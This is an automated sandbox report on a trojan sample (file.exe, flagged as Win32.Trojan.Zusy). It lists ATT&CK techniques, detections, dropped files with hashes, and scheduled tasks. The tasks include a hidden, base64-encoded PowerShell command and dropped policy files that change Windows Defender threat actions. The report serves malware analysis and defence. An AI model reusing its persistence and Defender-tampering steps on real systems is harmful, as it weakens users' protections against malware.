Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,1_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe File written: C:\Windows\System32\GroupPolicy\gpt.ini
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 1 Windows Management Instrumentation | 11 Scheduled Task/Job | 11 Process Injection | 2 Masquerading | 1 Input Capture | 121 Security Software Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 21 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 11 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 11 Scheduled Task/Job | Logon Script (Windows) | Logon Script (Windows) | 1 Modify Registry | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 1 Native API | Logon Script (Mac) | Logon Script (Mac) | 41 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 4 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
[Behavior graph: ID 753408; Sample: file.exe; Start date: 24/11/2022; Architecture: WINDOWS; Score: 88]

No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe | 100% | Avira | HEUR/AGEN.1250601 | |
| C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe | 100% | Avira | HEUR/AGEN.1250601 | |
| C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe | 100% | Avira | HEUR/AGEN.1250601 | |
| C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe | 51% | ReversingLabs | Win32.Trojan.Zusy | |
| C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe | 51% | ReversingLabs | Win32.Trojan.Zusy | |
| C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe | 51% | ReversingLabs | Win32.Trojan.Zusy | |
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 5.2.Install.exe.230000.0.unpack | 100% | Avira | HEUR/AGEN.1250601 | |
| 30.0.pJKKXsE.exe.1090000.0.unpack | 100% | Avira | HEUR/AGEN.1250601 | |
| 30.2.pJKKXsE.exe.1090000.0.unpack | 100% | Avira | HEUR/AGEN.1250601 | |
| 5.0.Install.exe.230000.0.unpack | 100% | Avira | HEUR/AGEN.1250601 | |
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| http://nuget.org/NuGet.exe | powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://github.com/Pester/Pester | powershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/ | powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://nuget.org/nuget.exe | powershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://contoso.com/License | powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://contoso.com/Icon | powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
            No contacted IP infos
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:753408
            Start date and time:2022-11-24 19:03:09 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 9s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:file.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:58
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.evad.winEXE@90/15@0/0
            EGA Information:
            • Successful, ratio: 40%
            HDC Information:
            • Successful, ratio: 100% (good quality ratio 97.8%)
            • Quality average: 84.8%
            • Quality standard deviation: 22.7%
            HCA Information:
            • Successful, ratio: 67%
            • Number of executed functions: 159
            • Number of non-executed functions: 28
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): Conhost.exe, SgrmBroker.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, files.testupdate.info, clients2.google.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, api2.check-data.xyz, www.testupdate.info, www.googleapis.com, service-domain.xyz
            • Execution Graph export aborted for target powershell.exe, PID 6316 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 19:04:10 | Task Scheduler | Run new task: gAhELFxgt path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
| 19:04:10 | API Interceptor | 1x Sleep call for process: Install.exe modified |
| 19:04:16 | Task Scheduler | Run new task: bbsSMGQQDZvgelOgpL path: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe s>DC /site_id 525403 /S |
| 19:04:21 | API Interceptor | 36x Sleep call for process: powershell.exe modified |
| 19:05:14 | API Interceptor | 1x Sleep call for process: pJKKXsE.exe modified |
| 19:05:18 | Task Scheduler | Run new task: agQaaMVMfgqpSGSbr path: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe s>mY /site_id 525403 /S |
| 19:05:23 | Task Scheduler | Run new task: AxVCmvJfwAUUq2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\wizgoPrNSfGOJXVB\dsOzyCe.wsf" |
            No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe | file.exe | | malicious | | |
| | file.exe | | malicious | | |
| | file.exe | | malicious | | |
| | file.exe | | malicious | | |
| C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe | file.exe | | malicious | | |
| | file.exe | | malicious | | |
| | file.exe | | malicious | | |
| | file.exe | | malicious | | |
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1108
                            Entropy (8bit):5.295294468448967
                            Encrypted:false
                            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
                            MD5:1C80F1303DD3DDBE3C096705FF52040A
                            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
                            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
                            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
                            Malicious:false
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):6571809
                            Entropy (8bit):7.996003603865134
                            Encrypted:true
                            SSDEEP:196608:91OAmLWOhmdNwFc7/hpQd4CYYlW7bWzg+aNxKpzDkp5x4WM:3OvWOkz3Qd4joeYSxKpzDo5x4WM
                            MD5:65D01849A2062434BCE6C580CDA92A1D
                            SHA1:8BEF36557E25532961724539E4DDBB4D11970627
                            SHA-256:8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
                            SHA-512:0EECF3824418C210DB4257EA5F2852BB32B02C5B3CE0FE62F841F71E10EC81482D889880EE42438B3EF2DC39682BDA2CD9435DD08CF21879D92148A9C7591EBE
                            Malicious:true
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):866146
                            Entropy (8bit):7.999783652399914
                            Encrypted:true
                            SSDEEP:24576:4YGhUN5iugAVdfj07IcTW6rIwX2N8m/ZQq2fd7w+IxulInxM:4YGhPufVdfjgIUWmIwX2N8SKPd86UM
                            MD5:927A00BC73AD358930C1BCA86D1F78AE
                            SHA1:AAED44842119FF3287961E29E9A7CE38B5C92DC3
                            SHA-256:526184BCF9AB17BEF2C67600F9D8E7E7CE4DDC4D4241BECC5F724E832AFB538D
                            SHA-512:E952277890D0E02B56836BFCE7BC9427CF8616D06E4EBDE2F07EAE9899E7CD837BEADD93D6919627492B44EF91E7F2E08F37597840B2801AEA5313423CEF7932
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            • Filename: file.exe, Detection: malicious
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12224
                            Entropy (8bit):5.378646971222007
                            Encrypted:false
                            SSDEEP:192:ftH+8WSFv6anhZkECl+hurbf2s2DAsoPEBOoSVFEJ+aNK1eK9kN0rI:fteU767rb/095pSVW2rI
                            MD5:0CFB8B33CC3E653098EAB5725BF1BC5A
                            SHA1:5923E7777549575FFF8B5FB69A9C2C977A5A850B
                            SHA-256:B85D5245BB5160EAAC695AC6A0E8879128AD053941517F2237DB19F17918FD77
                            SHA-512:318AEC29CFA311B7024FAA96209EF1DD1A0471F04E9D698D0057B07F536A3D9387A3C240F1A6326769556BBDA3C6404C25AFF3C51312E2C82E7BB05F8B8A3B22
                            Malicious:false
                            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration........................................T.@..>@..)@.Md@.]d@.Nd@...@.V.@.H.@.X.@..)@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..)@..T@.@X@.?X@.
                            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            File Type:RAGE Package Format (RPF),
                            Category:dropped
                            Size (bytes):4488
                            Entropy (8bit):3.5323112272256827
                            Encrypted:false
                            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0R0yi0A0L0e0R060w8:5
                            MD5:ED7FF4D7DB726C80E96C58C5F5E0711C
                            SHA1:0F85681245C7A5F8BB772DF77CCF156350328CA7
                            SHA-256:5F08875E4A6BE7333B7C56A7886EB4DB4785EF8423DE97D07008D047C16B360A
                            SHA-512:9BE0F3194A02DE1BD5D375EB81663F515E409710CAEA6DE14E21ECF385477BE77FBD9DF43C0D609B24B593EC8894572F1F2044F5A74F07714A0645D7F5189616
                            Malicious:false
                            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.
                            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):268
                            Entropy (8bit):4.9507895998010145
                            Encrypted:false
                            SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                            MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                            SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                            SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                            SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                            Malicious:true
                            Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.
                            Process:C:\Windows\SysWOW64\schtasks.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):532
                            Entropy (8bit):3.658255490968357
                            Encrypted:false
                            SSDEEP:12:poDBJSGQ1zKvkua3KMiTM5pgQ1zKvkuMzcFaV6:pG25vz+O15vfz8
                            MD5:994758BDDB3C8D6ADF78A680641AD848
                            SHA1:975BB5F5437BA677A27EC3A9ADA7AA03BD7DABDE
                            SHA-256:7EA9020AF7B09CED7041E5B68A80C90ABD542AAAF1ED9B845F237B1CD4E6AC19
                            SHA-512:C736FDC23FBE881D632EEDD9DC82044A181470A77107939F9D2DB8A1DB3466C202F0F85F09E9FF575DCCE84CB131B4D35CC192B221B0BA2BDAA3BA006235CF75
                            Malicious:false
                            Preview:....7+".J..D...o..-fF.......<... .....s...............................Q.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.\.p.J.K.K.X.s.E...e.x.e.....D.C. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...E.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.a.l.f.o.n.s...................0...............................................
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1
                            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
